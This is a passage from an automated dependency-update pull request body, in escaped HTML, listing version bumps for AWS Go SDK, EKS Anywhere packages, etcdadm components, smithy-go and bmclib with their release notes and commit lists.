href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca 